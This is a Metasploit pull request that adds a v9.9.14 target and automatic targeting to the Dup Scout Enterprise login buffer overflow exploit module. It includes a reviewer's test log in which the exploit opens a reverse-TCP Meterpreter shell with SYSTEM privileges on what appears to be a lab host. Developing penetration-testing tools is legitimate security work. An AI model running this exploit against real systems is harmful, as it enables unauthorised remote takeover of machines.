dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting #14794

Merged
merged 1 commit into from
Mar 12, 2021

@bcoles bcoles commented Feb 23, 2021

  • Resolve Rubocop violations
  • Add AutoCheck
  • Add Notes
  • Add v9.9.14 target
  • Add auto targeting

@bcoles bcoles force-pushed the dup_scout_enterprise_login_bof branch from 00cbea7 to f89d67d Compare February 25, 2021 17:14
@gwillcox-r7 gwillcox-r7 self-assigned this Mar 11, 2021
@gwillcox-r7

Seems to be working well, nice work @bcoles!

msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > show options

Module options (exploit/windows/http/dup_scout_enterprise_login_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.18.63.23     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.18.54.135    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run

[*] Started reverse TCP handler on 172.18.54.135:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise 9.9.14 (x86)
[*] Generating payload ...
[*] Sending payload (10000 bytes) ...
[*] Sending stage (175174 bytes) to 172.18.63.23
[*] Meterpreter session 1 opened (172.18.54.135:4444 -> 172.18.63.23:50856) at 2021-03-12 11:57:10 -0600


meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-KUO5CML
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Mar 12, 2021
@gwillcox-r7 gwillcox-r7 merged commit 8dce1ac into rapid7:master Mar 12, 2021

gwillcox-r7 commented Mar 12, 2021

Release Notes

Improved the exploits/windows/http/dup_scout_enterprise_login_bof module to add: support for v9.9.14 of Dup Scout Enterprise, additional Notes which may help pentesters determine the potential side effects of the exploit, support for the AutoCheck mixin to allow users to automatically check if a target is vulnerable prior to exploiting it, support for automatic targeting whereby the exploit will automatically determine the version of the target and will adjust the exploit accordingly if it is vulnerable, and compliance with new RuboCop standards.

@bcoles bcoles deleted the dup_scout_enterprise_login_bof branch March 13, 2021 02:04